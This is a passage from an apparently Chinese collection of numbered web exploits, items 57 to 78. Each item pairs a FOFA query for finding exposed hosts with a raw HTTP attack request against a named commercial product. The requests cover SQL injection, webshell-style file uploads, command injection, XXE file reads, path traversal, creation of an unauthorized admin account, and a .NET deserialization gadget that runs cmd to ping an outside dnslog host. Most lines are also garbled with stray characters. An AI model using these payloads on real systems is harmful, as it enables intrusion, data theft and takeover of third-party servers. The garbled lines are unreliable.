' i( J+ P7 N" b% o( q# ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
; S( v2 {1 M( W" _+ Y; P1 {Content-Type: application/json
' |3 l. K) `5 C' m; P
8 W3 G. Y; h% e+ d( B{4 z3 `: j; T2 ~: u% I) g$ Y
"storeID":{
. X+ z) ?3 E8 p+ `1 J; g6 d "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
( [6 E+ q8 L& U+ {; K3 A "MethodName":"Start",
0 S p7 {+ \& U6 U, _2 h7 `1 e "ObjectInstance":{. c2 `: D A$ O* a: q& A
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% L2 h6 |! X4 i8 E# t/ A) S) f "StartInfo": {$ O$ r4 }- l5 x; e/ t- i# V# p
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
( j, P. p& D7 z "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"# w" [; D4 j3 M) t: i: v
}
9 u, Z! \/ q/ y- @* c }
3 Y" E: d9 E& z9 g+ f' u- j0 M }) m+ {9 c4 d2 J/ B7 S, j- l0 e9 u+ {
}
$ A4 Z% t' N6 h- H; m8 N$ M% |9 @4 V6 d
6 G( ]" y# ^! C3 L
57. 畅捷通T+ keyEdit.aspx SQL注入
2 l! ?, d* _1 N$ `8 Z4 \* P& r# pFOFA:app="畅捷通-TPlus"
' {% _# x& {& w2 y; n! M: r3 \GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
, n& a. R3 `* U8 k6 P3 r8 P2 IHost: host0 }& V( G8 U) }# [7 g' \
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% ~6 u8 }3 [( W h" c. G3 @" \; j
Accept-Charset: utf-83 `- t' E/ z4 S/ P
Accept-Encoding: gzip, deflate! T( R2 o& @6 J( x
Connection: close
* S d4 s6 x7 I* j$ H, l: e$ l+ x7 w3 _
1 c# g$ ?! k. K0 S5 ?58. 畅捷通T+ KeyInfoList.aspx sql注入/ O! C1 l" j$ L- {
FOFA:app="畅捷通-TPlus"1 x( L6 Z! F* Y# ? Y3 |2 B
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1! O2 d( \/ \1 _# s7 _$ y x+ `% P
Host: your-ip
3 g E! g! N2 V3 S' ~6 c9 O* e* }1 GUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36% R* f- H+ |, F6 @. W! t V
Accept-Charset: utf-8
: W% J' u% ?; a# b: [5 lAccept-Encoding: gzip, deflate! j" }8 Q$ ]& [1 J r
Connection: close
0 R3 d0 h; [0 O8 @: c% r( `- a6 n z& R5 G+ |' a1 g
% R% ^8 n5 @1 i# o, ~; u59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行" [8 t& O4 z( H3 w3 a: I! F) |
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
5 ]. a# I3 j0 H/ g3 f! j/ _POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1' j6 z) {# |0 }3 M8 @2 N
Host: 192.168.86.128:9090" y) T8 F. ~" a8 l( o) r! Q& R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
- \. t4 r: v3 ?3 b8 }2 dConnection: close; E$ `' J! p# X; i/ h
Content-Length: 1669" e& `8 C/ |1 e) }- J5 |
Accept: */*! x! I, r6 y! H! X- Q
Accept-Language: en
0 E5 W# I: c6 d* W3 KContent-Type: application/x-www-form-urlencoded# F w0 o s' P6 N8 P7 A
Accept-Encoding: gzip1 E2 c: C# |+ g
! Z9 `3 M3 A) f/ T9 Z; n6 c
PAYLOAD5 L# H$ m4 J% g; ]+ e; q6 y! Q/ |
1 z ?! i8 s- {, r, g1 |, K ?/ c) W$ N3 t5 f$ [' c& Y. Q& ~ d
60. 百卓Smart管理平台 importexport.php SQL注入% y. X- h* O, V1 X) C N: B2 ]) M
FOFA:title="Smart管理平台"
, l0 O$ \: `+ d+ q! G2 KGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
. K* N$ m H3 W1 g7 ?3 @Host:9 U! z! s0 A) `! H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 ~, |$ t9 E% e0 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 D# D5 f- r9 o) M% B
Accept-Encoding: gzip, deflate
1 C6 W7 b- H' J& i, {- c9 lAccept-Language: zh-CN,zh;q=0.9
; H9 c( i+ P- o4 ^ n" I, ?Connection: close* |8 {4 J4 W# [' f3 ]( m; R6 o* g
% B; K4 T7 N+ C( x. f$ h
. R1 g6 C9 [! } i9 [/ _9 D61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
! A* }2 F/ d* B A+ bFOFA: title="欢迎使用浙大恩特客户资源管理系统"
4 U2 Z X8 ~1 n+ J. tPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1- {9 h# t+ X4 L& ~( H. A
Host: x.x.x.x
# J$ ]! k5 i5 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# y! @& C: V% o+ k& s9 C* l
Connection: close |8 F% E/ i0 t C
Content-Length: 27
) L! E( P- f) G5 G& qAccept: */*
. D0 |7 e' X5 y$ ]Accept-Encoding: gzip, deflate
" }& s& Y4 s) a1 B0 P; d- gAccept-Language: en
4 X5 ]3 F# l1 E8 e* t0 W/ K; |/ d+ o( UContent-Type: application/x-www-form-urlencoded
' I) W4 }9 m* R5 E: X
( Z0 ?( ?; U* H% T6 m8uxssX66eqrqtKObcVa0kid98xa. `1 X4 B4 Z4 Q7 h( B
9 i& f2 G+ \% L5 D$ J" y
# [. m3 z/ b8 C; Z* O# `
62. IP-guard WebServer 远程命令执行
* {+ u3 `4 x. s' XFOFA:"IP-guard" && icon_hash="2030860561"# j6 Z/ ?; Y! ^" |
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.13 f+ L0 M, X+ a$ b p8 V% J" I
Host: x.x.x.x
/ ` _3 k; }- @% |/ Q* aUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
( r( f% F- u* C! \" q6 h/ TConnection: close
* u& \+ o1 U" p6 X4 U6 wAccept: */*; ^5 u8 t' H8 }; v
Accept-Language: en
! }( h% d; W$ T( f* XAccept-Encoding: gzip' @1 o( O' E$ B# K$ r+ K" l+ z" q' i
1 a9 ?1 i# d& F0 v* Y2 j
, Q8 @* L, I4 O* v, o: N) z访问% Z% l7 A+ w/ N+ ~
. h; {, G6 q" [4 D, GGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.13 S0 `) u$ j: n" `2 E
Host: x.x.x.x3 M4 F- _) e- u5 v6 f" v
: C2 N& S) j* N
$ l: C' B9 t; ^9 s5 c7 W( B/ U63. IP-guard WebServer任意文件读取
8 d+ a/ h/ |) }" x. ]+ O! QIP-guard < 4.82.0609.0
, l/ C" w8 x4 l, t9 s+ VFOFA:icon_hash="2030860561": {% z& \' h8 T; Y* ]7 `3 [$ v% l
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.18 w3 H! X: [2 y7 y& K
Host: your-ip( P6 J) f# r) r) ], }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, _6 l% u1 r( d- q6 q0 N( zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 q3 i) i1 n8 }4 j% ?
Accept-Encoding: gzip, deflate4 r) T, t B8 t- ~" B! x4 z) d; A; v
Accept-Language: zh-CN,zh;q=0.99 F' Y1 i5 [. t5 S' Q
Connection: close; o: \/ t2 X# S
Content-Type: application/x-www-form-urlencoded; w( v* Y* `/ q K( c. X
8 z2 }+ x8 {- B. Vpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
5 Y' G: n1 o! D( p" N9 T7 e' b
7 Z! s) v7 b1 F# {64. 捷诚管理信息系统CWSFinanceCommon SQL注入' Q/ T% o- F$ [# [4 q
FOFA:body="/Scripts/EnjoyMsg.js"# x0 X! ^' H" v
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
& s4 o- P9 o; P6 u( x* A& _" fHost: 192.168.86.128:9001' P3 J- v5 G/ P1 n0 G, X' U3 c
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.361 j) | b; R. ~% k5 ^" s Q
Connection: close
5 L/ w2 [& W! K F. Z! VContent-Length: 369
- k) d# X7 v1 L" yAccept: */*
, T) J6 A3 ?6 G! Q9 l/ FAccept-Language: en
. s5 |) U. L% N8 K# IContent-Type: text/xml; charset=utf-8
; Z) R0 }- s ?0 ^$ x0 nAccept-Encoding: gzip! }" F! D' i$ P4 G- z
) s1 z5 j1 k$ Q
<?xml version="1.0" encoding="utf-8"?>9 v [5 k8 K5 p; Z" l. J
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">; {1 m" |5 r) J6 u' y, R3 s: E
<soap:Body>
( w7 X1 k" ]; x+ E <GetOSpById xmlns="http://tempuri.org/">
- ~6 w: O8 }$ u5 ?3 H& ~3 y9 q1 L% k, b7 D <sId>1';waitfor delay '0:0:5'--+</sId>8 J: }3 X3 z* n+ r% V
</GetOSpById>6 _& S$ H3 f- s
</soap:Body>0 h4 I& g5 f Q" E
</soap:Envelope>/ C( g! [+ ], y# D2 @5 b) G
" w2 t- y/ m0 ~, y
& q3 P! B6 ~+ K' @$ @! o65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过5 h" t+ p* \" c" l
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
6 E3 d4 V$ }. d" s" R! f% U响应200即成功创建账号test123456/123456" Q+ |9 x1 @& @
POST /SystemMng.ashx HTTP/1.1
: j; G( A0 F0 p7 RHost:
+ _, ^. K5 I: k7 T# G# G% H- OUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
9 a: h$ \: v5 o1 V$ X6 `Accept-Encoding: gzip, deflate O/ X+ C6 B5 c6 k, J% J
Accept: */*5 H4 [# ?; [+ g+ ~, C$ I6 Z
Connection: close5 L& @5 G0 F. y" q5 r9 c
Accept-Language: en
0 N; `( w4 v& F! d' ?& D4 _6 UContent-Length: 174& ]' B% ^, e6 o: v* B
# Y4 }/ Z; D( u7 _* s9 _operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
7 z/ P* |1 K) O9 _* b0 p5 s1 ^
, e6 R/ g8 z1 s& J5 M' D' Z
- I& e% g$ y) q* J$ q66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
& U2 ~( l* V3 y0 w0 lFOFA:app="万户ezOFFICE协同管理平台"
6 }4 }% O! Q( \, c! }. k" j- F8 w
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1- u2 @& U5 Z' Y! G
Host: x.x.x.x+ |+ V4 S: e& s; |& Y# J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 P( R) E% q+ ^Connection: close8 B" O! q% X7 R/ D& V
Accept: */*( x5 M6 O+ r1 a5 Y8 n
Accept-Language: en
0 k w. z# y9 {: @9 \+ pAccept-Encoding: gzip5 l7 _+ E' {1 D$ p4 B
2 f& J3 [3 J$ ~/ |! Z
: Z) c$ C& f" Y1 s$ |- X5 s第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在! _; Q* y6 P- d+ x
2 H" @0 T" e# B X67. 万户ezOFFICE wpsservlet任意文件上传
& j! U: k% h" s, o/ o$ RFOFA:app="万户网络-ezOFFICE"
" C6 V. _" N& ^8 G& AnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
- L/ l' {1 v" I/ g2 YPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
( e& u9 o% v1 g/ p( x- FHost: x.x.x.x3 Y+ f' v" s9 Z4 a3 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
- H6 g$ U4 l) x3 V( gContent-Length: 173+ A- }. `3 F/ C! B, m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8% {7 m& ^) q. d
Accept-Encoding: gzip, deflate0 D9 Z/ A" G) s. Q7 Z. n) ~
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3: X: n' A) ]' V& ^
Connection: close
~4 Y! w, ?* M' K, ~! P) GContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp9 I& Y! p. c% @
DNT: 17 }" w* b4 b& u: O8 x+ [
Upgrade-Insecure-Requests: 1
" V. J: [* x. n: k% W* G
. r r! x& q* z W3 J--ufuadpxathqvxfqnuyuqaozvseiueerp
2 X [5 y* C: wContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
; [' X. {* t* C, i1 C* i4 ]* p7 }
1 V8 F2 I8 i/ o& C! v9 k; Q<% out.print("sasdfghjkj");%>. ]% O, g0 u+ C# m2 ]
--ufuadpxathqvxfqnuyuqaozvseiueerp--
I% w0 F4 |7 v n) p5 P3 `9 l- D- ~9 n3 K G6 U+ ?4 X
& m3 P4 M- E0 d* @' Q& x% o文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp) }* \& H. ^: R( g( m# p
3 L* M+ m: ~$ `. M; G+ y. R
68. 万户ezOFFICE wf_printnum.jsp SQL注入9 |! g' ~+ R2 U! {' v
FOFA:app="万户ezOFFICE协同管理平台"
. z G5 z+ g" @+ e% |GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.13 k% X9 ?& w7 @! j& y
Host: {{host}}* r9 S( ~) p' ?4 n+ k1 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36' k! {# H2 H5 f+ m
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8% l/ |1 B6 Y8 j3 |* [+ B2 ?& i
Accept-Encoding: gzip, deflate
1 p3 ~+ D& J: S3 HAccept-Language: zh-CN,zh;q=0.9
, Z9 z( ?9 L8 H6 B- qConnection: close
4 Z" A. Y# _5 T( W
( ^; c! s* P' y4 O2 B; @+ V" M1 J( i7 |0 q8 |. }2 r9 D0 e( I' e
69. 万户 ezOFFICE contract_gd.jsp SQL注入0 ]1 i" [; \( U' p2 v$ i
FOFA:app="万户ezOFFICE协同管理平台"
$ E8 g2 u, c6 JGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
8 G, x7 X8 ?5 J" u9 {Host: your-ip
2 R! o6 f* @: [9 t- ~- qUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ [9 J7 w* T8 Q% O. E) JAccept-Encoding: gzip, deflate; W- G. g, y; }1 W' u1 A
Accept: */*
8 `3 b* T% x( WConnection: keep-alive
^6 d e# e# C ~) ~- k
; |, k( `0 j# a6 L1 I& e
" m9 _0 s# M: ?) f: d9 _70. 万户ezEIP success 命令执行
" i k2 h7 b: ?- a6 d8 ~FOFA:app="万户网络-ezEIP"
" B4 c4 {: U9 {( P# VPOST /member/success.aspx HTTP/1.1
0 F5 y- J% f& g0 f# `Host: {{Hostname}}
% g5 _+ Y* v) i/ |7 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36. j9 \% l7 J( S/ X9 Q: e* j
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=% a7 ?" |. {6 j: g" R6 b: j5 s
Content-Type: application/x-www-form-urlencoded! t! A8 k3 O+ F& T$ L
TYPE: C
0 ]/ y3 ~1 e% ?, x0 CContent-Length: 16702$ U" B s+ ^5 m! G
/ V7 d. r# G) @$ _- X__VIEWSTATE=PAYLOAD
' D; Y. ]8 e1 }* }8 d( U5 S0 {: q4 V6 C
2 v( D' M& o. I5 @& L+ d) Z
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
0 z* [7 V& X5 u1 AFOFA:body="PM2项目管理系统BS版增强工具.zip"
+ w2 s# s3 t+ A$ YGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1" d- Q$ z5 A& X+ ?/ l
Host: x.x.x.xx.x.x.x
& c# X: e+ V8 X7 [0 gUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36# X" _) t d+ m- B4 C; Y5 P8 a1 Q
Connection: close, |7 `) o0 F9 O, q" L6 _. {2 z: ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 A7 Y1 ~, l5 t! Y. _Accept-Encoding: gzip, deflate3 u3 t7 T9 h4 i+ @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- K; o: F& G$ [; y6 zUpgrade-Insecure-Requests: 1( A6 F7 z; t) `; t% I$ u# q
$ J' Z) r6 |, R3 c. Z# X
4 A0 m( I7 U2 l( ?- G72. 致远OA getAjaxDataServlet XXE
, e) l3 z; _+ ?FOFA:app="致远互联-OA"1 ~$ F9 h% [$ P+ e% Y; B ?
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.19 ^1 T2 P+ O/ m" a. f: ?
Host: 192.168.40.131:8099
7 w6 J$ }* w3 O# G$ A3 RUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 a I& Y/ _, j f. A. U% \
Connection: close& S; ~* w1 `2 }, c6 a+ ~
Content-Length: 583
/ y0 {# b2 J; H6 ]) Q2 B! V8 H" S8 q3 _Content-Type: application/x-www-form-urlencoded2 P. x; H/ q$ N7 c( E
Accept-Encoding: gzip& C+ a3 ]+ g, Z- i) f- V$ N1 M" J
: K4 P: L( E7 K _
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E7 P9 e$ k V* [
9 n" E: P7 Z/ n0 @3 p$ [
( V* ]1 h0 ?3 k73. GeoServer wms远程代码执行
, K. _, r2 _8 A3 M5 lFOFA:icon_hash=”97540678”
8 ~3 h4 `; e# N- }) o/ I9 LPOST /geoserver/wms HTTP/1.12 {5 d5 s# X1 o
Host:9 Q4 W, j9 Q; r9 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 F6 |7 N0 A9 G) F) J! o
Content-Length: 1981
$ s( O# g$ B9 f( R0 u8 JAccept-Encoding: gzip, deflate# N4 j7 ^8 L- Q/ _! k' R) B
Connection: close! p4 f) X3 L+ }5 ?* I
Content-Type: application/xml
5 J+ j% K! q; ?- l( jSL-CE-SUID: 3
( q& a' J0 g% Z
( }8 i+ w! |+ n, N7 Z) d- UPAYLOAD4 q+ \/ M( G/ j
4 ^, x6 j$ F6 a4 g* T
0 n% @- a9 o* Z& h6 ^6 @! q' T
74. 致远M3-server 6_1sp1 反序列化RCE
6 ~. x9 ?2 U zFOFA:title="M3-Server"1 f3 K) q# `9 I# Y' R3 u
PAYLOAD
s" ~ j& j% @1 _/ t, |. N. F1 q7 e) D
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' m/ |$ T2 @( e c0 c' Z! ]FOFA:app="TELESQUARE-TLR-2005KSH"
2 m% I7 p( S4 V3 gGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.17 U- }9 e9 U) l4 X! }+ h% [! u
Host: x.x.x.x0 R9 l# M' p$ e" H8 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, n0 v. L9 _6 S; v6 P; o; _Connection: close, B; E* f7 j1 l ?% Z+ s
Accept: */*
1 p8 I) N8 o( q6 y) @Accept-Language: en2 H5 S+ v3 l# P8 s* Z2 u! M
Accept-Encoding: gzip& m0 I n1 |0 ?
3 O ~: e: i5 y1 F
2 t# G0 x% a% [ W! n) ~
GET /cgi-bin/test28256.txt HTTP/1.1- t2 [, k+ l5 S# Y/ b |
Host: x.x.x.x; v1 D1 y: M' y' {' P
5 ~: R0 `) X7 m8 E7 n
# `2 B% X: l* C$ W1 e8 j76. 新开普掌上校园服务管理平台service.action远程命令执行+ ^5 }7 e- {/ i' l
FOFA:title="掌上校园服务管理平台"
" [2 O4 H0 b" r0 ]POST /service_transport/service.action HTTP/1.18 y4 \; L8 h7 _# a6 g- v2 W( ?
Host: x.x.x.x4 v, Z; _4 ~. @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! `; C; S9 n% f5 B, R' h7 c% lConnection: close+ Q7 Y8 B/ B; z+ }1 z- J7 R( `% j
Content-Length: 2110 ~* F, T" |7 C& m# v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* S" Z3 Q/ t7 _/ @3 N% }/ H
Accept-Encoding: gzip, deflate; v, G: X; Q+ v+ l& \2 o) |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 i8 o, R# ~, I' a. n" M% p) }Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
. E/ i1 H7 Z4 Y" E4 i9 l( tUpgrade-Insecure-Requests: 1$ F @% g2 I' x( I- f0 y5 K
! U+ H9 E6 c& T& n! O{
* h7 X* r9 D- c1 ?2 x"command": "GetFZinfo",
, O, x/ O/ P3 ] "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
* P% x' J+ ?8 C ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"& C( `( S9 F/ w7 u( W# h6 b6 [
}
: C; y5 O' O7 c
5 W) a6 u m9 `5 W7 a& S# B4 L; X8 K- @; s- g4 I
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1+ a' ~ Q0 O x7 `9 t6 [3 @0 v
Host: x.x.x.x- q+ u3 A' C, M8 o$ y" Z6 r# l
& i# R- x. M v4 N
3 l3 c* x: g" e4 ^* g+ W8 q& z2 U7 }0 o- V5 R# h9 v
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
: m" R! ?0 K; rFOFA:body="F22WEB登陆"
+ q- M: q: Q; L5 F0 d8 kPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1 F1 d1 [4 H0 F, W" Y* W0 N* J
Host: x.x.x.x- }9 M: T# v$ [, I. r+ R0 E) C# \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 |1 C- L* Q6 {+ I: z) G4 xConnection: close# h- b' f) k% {- Y
Content-Length: 433
2 P; h+ n5 m8 B) z& }( sAccept: */*/ E* v6 w- B7 b" l
Accept-Encoding: gzip, deflate
. J. Y; \6 c2 Y: N* vAccept-Language: zh-CN,zh;q=0.9
+ z2 P8 r+ _' Z ]! qContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
; r6 u/ V) }" N* `' ` g( l. B" F1 k2 e: O
------------398jnjVTTlDVXHlE7yYnfwBoix
9 q6 q( K% W" X4 MContent-Disposition: form-data; name="folder"
3 y7 P0 b+ O' D5 f5 W
# k' O1 [: t7 D5 [/upload/udplog. ~; l! g8 d1 y- c* g0 {
------------398jnjVTTlDVXHlE7yYnfwBoix; z' O: j! @0 K5 D' x! y8 g5 N f) @1 T/ I
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
6 o7 R, V2 @5 C; ] jContent-Type: application/octet-stream6 H; g; m w* H9 u+ i3 e
0 \6 x. M0 M+ y7 S
hello1234567: H/ p! h7 M7 J( g0 g6 U$ x
------------398jnjVTTlDVXHlE7yYnfwBoix: ?) ^9 ]# [5 l- f# m5 p
Content-Disposition: form-data; name="Upload"
& W1 o; O/ j+ x7 U1 S- ?$ Y$ ^
Submit Query. i' s, A+ Y. y$ l( W" V L
------------398jnjVTTlDVXHlE7yYnfwBoix--) z% x0 ^0 _& T
0 v6 G% Q4 l& R3 z0 q1 H
- a1 h. }$ z" y, R5 D5 e78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
7 Z" `9 m9 k1 C7 \" o3 B. z9 M; y2 ?FOFA:icon_hash="2001627082"
/ c& Q: J& ~5 \0 E8 zPOST /Platform/System/FileUpload.ashx HTTP/1.1
( |2 \4 c5 d& PHost: x.x.x.x7 P$ F8 e& k& M) k) O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ ?3 b( m( o ^
Connection: close
" Z' q: h. O6 G2 I, Q3 n; aContent-Length: 336
0 ]0 K# F& a; oAccept-Encoding: gzip- F0 {2 P, l- w% m8 N
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l/ q& ]$ Y) V" W
5 K2 k* ?1 h" F# ?9 l. k/ @
------YsOxWxSvj1KyZow1PTsh98fdu6l. ~! _0 V" O+ n% n
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
, b/ z5 ?3 |# U5 q% w A( c5 vContent-Type: image/png$ F9 f0 ^2 E0 t- X8 |& m& R
% n3 U$ P- f5 S; W6 [, F* e* g
YsOxWxSvj1KyZow1PTsh98fdu6l$ i+ t6 G% ~7 B* T6 l
------YsOxWxSvj1KyZow1PTsh98fdu6l
( ?& O/ B: |1 f% b+ n$ @! `4 A; qContent-Disposition: form-data; name="target"
7 m* G8 H6 q! i! q+ P8 Z4 \& g: k2 [% Q! h W9 H# u
/Applications/SkillDevelopAndEHS/+ j1 ]3 S& ^ n& ]
